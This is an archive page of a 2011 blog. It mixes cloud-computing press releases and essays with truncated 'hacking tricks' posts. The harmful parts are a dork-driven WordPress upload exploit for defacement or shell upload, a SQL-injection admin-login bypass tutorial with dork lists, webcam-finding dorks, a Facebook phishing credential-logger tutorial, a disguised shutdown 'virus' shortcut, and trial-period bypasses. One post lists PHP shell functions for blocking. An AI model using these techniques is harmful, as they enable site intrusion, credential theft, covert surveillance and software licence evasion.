Articles

Showing posts from October 2011

Bangalore Embodies The Silicon Valley

I spent a few days in Bangalore this month. This place amazes me every single time I visit it. Many people ask me whether I think Bangalore has potential to be the next Silicon Valley. I believe it's the wrong question. There's some seriously awesome talent in India, especially in Bangalore. Don't copy the Silicon Valley. There are so many intangibles that Bangalore won't get it right. And there's no need to copy. Create a new Silicon Valley that is the best of both worlds. If you want some good reading on what makes Silicon Valley the Silicon Valley, read the essay "How to be Silicon Valley" by Paul Graham. Bangalore does have some of these elements - diversity, clusters, a large number of expats etc. It's quickly becoming a true cosmopolitan city in India. You don't need to know the local language (Kannada) to live there. It does have a few good colleges such as IIM and IISC, but no IIT. The real estate boom in Bangalore is a clear indicator of

How to bypass the trial period of software !!

1. Uninstall the application.
2. Go to Start and type "Regedit".
3. Go to HK Local Machine > Software > Your Software name. Delete the key. Do this for HK Current User as well if a key for that software exists there.
4. Now go to Run, type %temp% and delete all the files that exist there. They are just temporary files, so it won't matter much.
5. Go to Users > Username > Appdata and check all 3 directories, that is "Local", "LocalLow" and "Roaming", for your software's entry. Delete it.

Now all you have to do is re-install the program and enjoy the evaluation period again!

Note: It works for most of the party software only.

NJVC® Cloud Computing Expert Kevin Jackson to Speak at NIST Cloud Computing Forum & Workshop IV on Nov. 3 in Gaithersburg, Md.

VIENNA, Va., Oct. 28, 2011 — NJVC®, one of the largest information technology solutions providers supporting the U.S. Department of Defense (DoD), is pleased to announce that Kevin Jackson, general manager, cloud services, will participate in the “Security Assumption Buster Panel” during the National Institute of Standards and Technology (NIST) Cloud Computing Forum & Workshop IV on Nov. 3 in Gaithersburg, Md.

Security Assumption Buster Panel
Date: Nov. 3, 2011
Time: 11:40 a.m. – 12:40 p.m.
Location: NIST, 100 Bureau Drive, Gaithersburg, Md.
Presenters:
* Curt Barker, panel chair and chief cybersecurity advisor, NIST
* Kevin Jackson, general manager, cloud services, NJVC
* Bill Newhouse, scientific advisor, cybersecurity, research & development computer security division, NIST

This expert panel will address common fallacies and misconceptions about cloud computing security and also discuss the NIST approach to risk ma

Make To Think And Think To Make

I'm a passionate design thinker and I practice design thinking at any and all opportunities. Design thinking is part art and part science. John Maeda is one of my favorite thought leaders on design. He published a post talking about art as a form of asking "what do I want to know" rather than "what do I want to say." As a product manager, making a product goes from what do I want to know — the requirements — to what do I want to say — manifestation of the requirements into a working product. I call it "Make to think and think to make". I make prototypes — make to think — similar to a form of art, to help me think and ask the right questions to fulfill my needs of "what I want to know". Human beings respond better to tangible artifacts than to abstract questions. These conversations stimulate my thinking to execute on those requirements — "think to make" — similar to "what do I want to say." The design thinkin

WordPress Easy Comment Upload Vulnerability:

Google Dork: "inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php" Open Google and enter the dork given. Now select any website and go to this URL: site.com/wp-content/plugins/easy-comment-uploads/upload-form.php You'll get an upload option here :) Now upload your deface page .... and check it here: site.com/wp-content/uploads/2011/10/yourfilename. Note: Different websites support different upload options, like txt, jpg, jpeg. You can also upload your shell on some websites .. :-)

Shut Down system by double Clicking on Internet Explorer !!!

Double click on Internet Explorer to restart the computer:
1) Go to the Desktop.
2) Right click > New > Shortcut.
3) In "Type the location of the item", write "C:\WINDOWS\system32\shutdown.exe -r -t 00" without quotes.
4) Click Next and in "Type a name for this shortcut" write "Internet Explorer" and click Finish.
5) Now right click on the shortcut of Internet Explorer, go to "Change Icon" and select the icon of Internet Explorer.
6) Now Virus is Ready….. check it out.. when you double click on the Internet Explorer shortcut… the computer will restart.
7) This is just a prank… don't misuse it..

How to make a folder with name “con” ?

"CON" is a system keyword and you can't create it using the normal method. Just try cmd.

Folder with name "con": go to the Command Prompt, go to the location where you want to make the folder with name "con", and write the command:
mkdir \\.\e:\con

To remove the folder again:
rmdir \\.\e:\con

Conceal XSS Injection in HTML5

history.pushState() was introduced in HTML5 and is meant for modifying history entries. By using pushState() we’re allowed to alter the visible URL in the address bar without reloading the document itself.

The Harmful Part:
The harmful part is that we can conceal the real location and replace it with anything we want. Although the hostname can’t be replaced, we can completely change the pathname. So, I made a brief PoC about hiding a non-persistent XSS exploit. It’s about executing a malicious script on a login page through a non-validated query parameter (quite a common situation). The script redefines form.action and then removes the malicious query parameters from the URL shown in the address bar.

Proof of Concept:
This PoC works only in modern browsers that have implemented this HTML5 proposal. This only works in Google Chrome 9 and Firefox 4 Beta. pushState() also works properly in Safari 5, but its security control refuses to load external scripts or execute injected scripts. I’ll inj

Online SQLI Scanning Website !!

You can use all these websites for online SQLI scanning. For these you will need a little knowledge of SQL injection.
* http://www.be007.gigfa.com/scanner/scanner.php
* http://scanner.drie88.tk/
* http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan
* http://wolfscps.com/gscanner.php

How to Hide text behind images ? (Steganography)

Step 1: Copy an image file to c: of your computer.
Step 2: Copy the text (which you want to hide) to the clipboard, by writing it in Notepad, selecting it, right clicking it, then choosing Copy.
Step 3: Open cmd, by going to Start — All Programs — Accessories — Command Prompt.
Step 4: In cmd type:
cd \
echo "your text to hide" >> "image.jpg"
Step 5: Now right click on image.jpg — Open with — Notepad. You can see your hidden text at the end of your image file contents.

How to find who is Invisible on Yahoo messenger ?

Sometimes some of your friends who appear offline in Yahoo Messenger may not actually be offline; they may be in the ‘Invisible’ mode. This may be because they are trying to ignore you or are too busy to talk to anyone. There is a small trick that you can use to find out what the truth is.

Firstly, open your Yahoo Messenger main window and double click on the name of the person whom you want to check. The chat window will open, obviously. Click the IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle. After loading the Doodle IMVironment there can be two possibilities:

1. If the user is offline, the Doodle area will show “waiting for your friend to load Doodle” continuously. See in the picture below:
2. If the user is online (but in invisible mode), after a few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page like in the picture below. So you know that the user is online.

How to Reset the Ubuntu Password....

Reset Your Ubuntu Password

Reboot your computer, and then as soon as you see the GRUB Loading screen, make sure to hit the ESC key so that you can get to the menu.

Root Shell – Easy Method

If you have the option, you can choose the “recovery mode” item on the menu, usually found right below your default kernel option. Then choose “Drop to root shell prompt” from this menu. This should give you a root shell prompt.

Alternate Root Shell Method

If you don’t have the recovery mode option, this is the alternate way to manually edit the grub options to allow for a root shell. First you’ll want to make sure to choose the regular boot kernel that you use (typically just the default one), and then use the “e” key to choose to edit that boot option. Now just hit the down arrow key over to the “kernel” option, and then use the “e” key to switch to edit mode for the kernel option. You’ll first be presented with a screen where you can find this written “ro single” You’ll want to remove the “r

Firefox Shortcut

As we know, Mozilla Firefox is very popular amongst all the browsers. It has lots of shortcuts, so here in this post I am going to show you the shortcuts available in Mozilla Firefox.

Double-click (on a word)                    Select the word.
Triple-click                                Select entire line.
Wheel click                                 Activate the Smooth scrolling
Hold Ctrl + Scroll Wheel forward            Increase font size
Hold Ctrl + Scroll Wheel backward           Decrease font size
Click one end, hold Shift & click another   Create a selection from the two points
F5                                          Refresh.
F6                                          Move focus to address bar.
F11                                         Toggle on/off full-screen mode
Alt

Branding Windows Xp with your Name and Details...

Open Notepad and copy these lines:

[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here

Save it with the name OEMINFO.INI in c:\windows\system32. Then right click on My Computer and select Properties. In the General tab a button will be highlighted (Support Information); click on it and you will be able to see the changes. Now if you want to display some more information, simply add more lines to the file, e.g.:

Line4=Your Working Hours Here

Chat with Friends through Command Prompt...

All you need is your friend's IP Address and your Command Prompt. Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

Now save this as "Messenger.Bat". Open Command Prompt. Drag this file (.bat file) over to Command Prompt and press Enter. Now, type the IP Address of the computer you want to contact and press Enter. Now all you need to do is type your message and press Enter. Start Chatting.......!

NJVC® General Manager, Cloud Services, Kevin Jackson to Moderate “Cloud Computing and the Intelligence Mission” Panel at GEOINT 2011 Symposium

Vienna, Va., Oct. 13, 2011 — NJVC®, one of the largest information technology (IT) solutions providers supporting the U.S. Department of Defense, is pleased to announce that Kevin Jackson, General Manager, cloud services, will serve as the moderator for the GEOINT 2011 Symposium panel, “Cloud Computing and the Intelligence Mission,” on October 19 in San Antonio.

Event: “Cloud Computing and the Intelligence Mission” panel
Date: Wednesday, Oct. 19, 2011
Time: 2 – 4 p.m. (central)
Location: Room 103, Henry B. Gonzalez Convention Center, San Antonio

Panelists:
* Don Cotter, CTO, Department of Homeland Security
* Bob Gourley, Editor, CTOvision.com
* Dr. Robert C. Norris, Director, Enterprise Architecture and Standards, National Geospatial-Intelligence Agency
* Michele Weslander Quaid, Chief Technology Officer and Innovation Evangelist, Google Federal

Description: Cloud computing, a new approach in the provisioning and consumption of IT, has been described as a means to cut federal IT

NOKIA Secret Codes

*** WARNING: Using secret codes may be harmful to your phone and result in disabling or worse. Use these codes at your own risk, we are not responsible for blocked phones while using these codes!!!

IMEI Number
*#06# Cells Identity Code (IMEI = International Mobile Equipment Identity)
XXXXXX XX XXXXXX X
TAC FAC SNR SP
TAC = Type Approval Code (first 2 digits = country code of the approval-country)
FAC = Final Assembly Code: (01,02 = AEG) (10,20 Nokia) (40,41,44 Siemens) (30 Ericsson) (50 Bosch) (51 Sony,Siemens,Ericsson) (60 Alcatel) (65 AEG) (70 Sagem) (75 Dancall) (80 Philips) (85 Panasonic)
SNR = Serial Nr.
SP = Spare (always "0")

Software Version
*#0000# shows the software version

Signal Processing
*3370# - Enhanced Full Rate Codec (EFR) activation. It will automatically restart.
#3370# - Enhanced Full Rate Codec (EFR) deactivation
*4720# - Half Rate Codec activation. It will automatically restart.
#4720# - Half Rate Codec deactivation
Enhanced Full Rate will give yo

Skip or bypass Rapidshare, Megaupload Waiting time...

Now you can easily avoid the waiting time, or as we usually say the time limit, when you download as a free user from file sharing services such as rapidshare, megaupload, depositfiles, hotfile. Normally you have to wait for 20-60 minutes to download the second file after downloading the first one. They implement this to invite users to purchase a premium service. But this way of limiting free downloads and asking free users to wait a long time to start another download can be annoying.

Skipscreen is a browser extension to bypass the waiting time on downloads. Unfortunately it can only be used with Firefox browsers to avoid waiting time while downloading files from some popular file hosting services like:
* Rapidshare.com
* zShare.net
* MediaFire.com
* Megaupload.com
* Sharebee.com
* Depositfiles.com
* Sendspace.com
* Divshare.com
* Linkbucks.com
* Uploaded.to
* Hotfiles.com
* 4shared.com
* Limelinx.com
* Link-Protector.com

Its use is very simple and does not require any

NJVC® Spotlights Cyber Security and Automated IT at Gartner Symposium/ITxpo® 2011

VIENNA, Va., Oct. 4, 2011 — NJVC®, one of the largest information technology solutions providers supporting the Department of Defense, announces its lineup for the Gartner Symposium/ITxpo®, Oct. 16 - 20 at the Walt Disney World Dolphin Hotel in Orlando, Fla. Visit the NJVC booth (#206) on the tradeshow floor to meet with company representatives and learn about NJVC’s extensive and proven portfolio of IT solutions for government and commercial customers.

NJVC will provide the following live demonstrations for attendees:
* Cyber Dashboard – Take a tour and learn how NJVC customers have benefited from this inexpensive yet highly effective cyber tool that provides customizable, real-time situational awareness visualization across an entire IT enterprise.
* Streamlined NJVC Automation Products, Services and Solutions™ – SNAPSS™ is a suite of cost-effective solutions that automate and streamline IT enterprise services for customers no matter the location of their users.

Trojan Removal - A General Process

If you are using an operating system such as Windows XP or ME, you MUST disable System Restore before attempting any removal! After successful removal, you can re-enable System Restore. Here is how to turn off System Restore:

For Windows ME
1. Right-click the My Computer icon on the Desktop and click Properties.
2. Click the Performance tab.
3. Click the File System button.
4. Click the Troubleshooting tab.
5. Select Disable System Restore.
6. Click Apply > Close > Close.
7. When prompted to restart, click Yes.
8. Press F8 while the system restarts.
9. Choose Safe Mode then hit the Enter key.
10. After your system has restarted, continue with the scan/clean process. Files under the _Restore folder can now be deleted.
11. Re-enable System Restore by clearing Disable System Restore and restarting your system normally.

For Windows XP
1. Log on as Administrator.
2. Right-click the My Computer icon on the desktop and click Properties.
3. Click the System Restore tab.
4. Select Turn of

How to hack a website using Authentication bypass.

Basic SQL injection: gaining authentication bypass on an admin account. First we need to find a site; start by opening Google. Now we have to use a Google dork. There is a large number of Google dorks for basic SQL injection. Here are the best: "inurl:admin.asp" "inurl:login/admin.asp" "inurl:admin/login.asp" "inurl:adminlogin.asp" "inurl:adminhome.asp" "inurl:admin_login.asp" "inurl:administratorlogin.asp" "inurl:login/administrator.asp" "inurl:administrator_login.asp" "inurl: admin.php" "inurl: login/admin.php" "inurl: admin/login.php" "inurl: adminlogin.php" "inurl: adminhome.php" "inurl: admin_login.php" "inurl: administratorlogin.php" "inurl: login/administrator.php" "inurl: administrator_login.php" Now what to do once we get to our site. The site should look something like t

NJVC® to Demonstrate Enterprise Automation at GEOINT 2011

VIENNA, Va., Oct. 6, 2011 — NJVC®, one of the largest information technology (IT) solutions providers supporting the U.S. Department of Defense (DoD), is pleased to offer live, compelling demonstrations on the company’s Streamlined NJVC Automation Products, Services and Solutions™ (SNAPSS™) at GEOINT 2011 Symposium—the largest intelligence event in the United States—on Oct. 16 – 19 at the Henry B. Gonzalez Convention Center in San Antonio. Visit the NJVC booth (#601) on the expo floor to meet company experts and learn about NJVC’s extensive and proven portfolio of IT services, particularly geared for DoD and intelligence customers.

Experience the following thought-provoking demonstrations:
* SNAPSS™ – SNAPSS™ is a suite of cost-effective solutions that automate and streamline IT enterprise services for customers no matter the location of their users.
* Persistent Desktop Instance™ – Discover NJVC’s new service—PDI™—a virtual desktop available from “thick” customers (desktops or laptop

Access webcams online using Google dorks.

Axis: inurl:"view/indexFrame.shtml" inurl:"view/index.shtml" intitle:"Live View / - AXIS" intitle:axis camera intitle:"axis #Kameramodell#" Canon: inurl:sample/LvAppl/ JVC: intitle:"V.Networks [Motion Picture(Java)" EvoCam intitle:"EvoCam" inurl:"webcam.html" WebcamXP: intitle:"my webcamXP server!" MOBOTIX: inurl:/control/userimage.html Panasonic: inurl:/ViewerFrame?Mode=Motion FlexWatch: inurl:toolam.html inurl:viewash.html Toshiba: intitle:"TOSHIBA Network Camera - User Login" Sony: inurl:/home/homeJ.html And Some Others inurl:/view.shtml intitle:”Live View / - AXIS” | inurl:view/view.shtml^ inurl:ViewerFrame?Mode= inurl:ViewerFrame?Mode=Refresh inurl:axis-cgi/jpg inurl:axis-cgi/mjpg (motion-JPEG) inurl:view/indexFrame.shtml inurl:view/index.shtml inurl:view/view.shtml liveapplet intitle:”live view” intitle:axis intitle:liveapplet allintitle:”Network Camera NetworkCamera” intitle:axis intitle:”v

How to download books from Google books for Free?

Step 1:
* Download/install the Greasemonkey addon (Customize the way a web page displays or behaves, by using small bits of JavaScript.) in Firefox
* Install this userscript: google book download
* Download/install FlashGot (FlashGot is the free add-on for Firefox and Thunderbird, meant to handle single and massive ("all" and "selection") downloads with several external Download Managers.)
* Download/install Flashget (Download Manager)

Step 2:
* View your favorite book. For example: http://books.google.com/books?id=Tmy8LAaVka8C&printsec=frontcover
* In the left panel, click Download this book
* Select all pages, right-click, choose FlashGot Selection
* Press OK to start downloading. Note: Download only one page at a time, or your IP will be banned
* After the downloading is finished, in FlashGet, left panel, choose Downloaded folder.
* Select all pages of the book, right-click, choose Rename -> Comment As Filename
* Read book

How to Hack Facebook Account Using Phishing webPage

Phishing WebPage: Creating a web page which looks like any site is described as phishing. By creating a phishing web page, you can make users believe that it is the original website and enter their id and password.
Step 1: Go to Facebook.com. Right click on the white space of the front page. Select "View Page source". Copy the code to Notepad.
Step 2: Now find (press Ctrl+F) "action=" in that code. You will find the code like this: The big red ring that circles the action= you have to change. You have to change it to 'action="a.php"'. After you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html
Step 3: Now we need to create the "a.php" to store the password. So open Notepad and type the following code: header("Location: http://www.Facebook.com/login.php "); $handle = fopen(

Is your computer “male” or “female”?

1. Open Notepad
2. Type the following line in Notepad:
CreateObject("SAPI.SpVoice").Speak "I love you"
3. Save file as computer_gender.vbs
4. Run the file.
If you hear a male voice, your pc is a boy. If you hear a female voice, your pc is a girl...try it guyz.......!!! its amazin !!!

Secret Codes For iPhones

Following are the secret codes for your iPhone:
1) *3001#12345#* and tap Call. Enter Field Mode. Field mode reveals many of the inner settings of your iPhone, specifically up-to-date network and cell information.
2) *#06# Displays your IMEI. No need to tap Call. IMEI is the unique identifier for your cell phone hardware. Together with your SIM information it identifies you to the provider network.
3) *777# and tap Call. Account balance for prepaid iPhone.
4) *225# and tap Call. Bill Balance. (Postpaid only)
5) *646# and tap Call. Check minutes. (Postpaid only) These three are pretty self explanatory.
6) *#21# and tap Call. Setting interrogation for call forwards. Discover the settings for your call forwarding. You’ll see whether you have voice, data, fax, sms, sync, async, packet access, and pad access call forwarding enabled or disabled.
7) *#30# and tap Call. Calling line presentation check. This displays whether you have enabled or disabled the presentation of the calling line, presu

How to secure your server from PHP Shells!

Adding this code to your php.ini file will protect your server from the execution of shells like c99, r57 or b374k.

disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abort, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpassthru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix_getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo, system, passthru, shell_exec, escapeshellarg, escapeshellcmd, proc_close, proc_open, ini_alter, dl, popen, popen, pcntl_exec, socket_acce

Mr. Jeffrey Kaplan Talks About The Cloud Channel

This afternoon I had a very interesting discussion with Mr. Jeffrey Kaplan, Managing Director of THINKstrategies and founder of the Cloud Computing Showplace. His firm is focused entirely on the business implications of the transition of the technology industry from product-centric to services-driven solutions, including Software-as-a-Service (SaaS), Cloud Computing and Managed Services. Mr. Kaplan is also the Founder of the Cloud Computing Showplace (www.cloudshowplace.com), a vendor-independent, online directory and best practice resource center regarding SaaS, Platforms-as-a-Service (PaaS), and Infrastructure-as-a-Service (IaaS), including Managed Services with nearly 1,800 companies divided into over 90 categories.

Our conversation focused on the evolution of the system integrator within the public sector marketplace. One of his key goals was to dispel the myth that system integrators and their channel partners will be displaced by the rapidly growing list of cloud providers. In

The Economic Benefit of Cloud Computing

(The following is the Executive Summary of a recent NJVC Executive Whitepaper. The full version is available at NJVC.com)

Cloud computing, as defined by the National Institute of Standards and Technology, is a model for enabling “… convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction.” NIST is implying the economies of scale that go with cloud computing when it refers to a pool of configurable computing resources. Cloud computing is often referred to as a technology. However, it is actually a significant shift in the business and economic models for provisioning and consuming information technology (IT) that can lead to a significant cost savings. This cost savings can only be realized through the use of significant pooling of these “configurable computing resources” or resource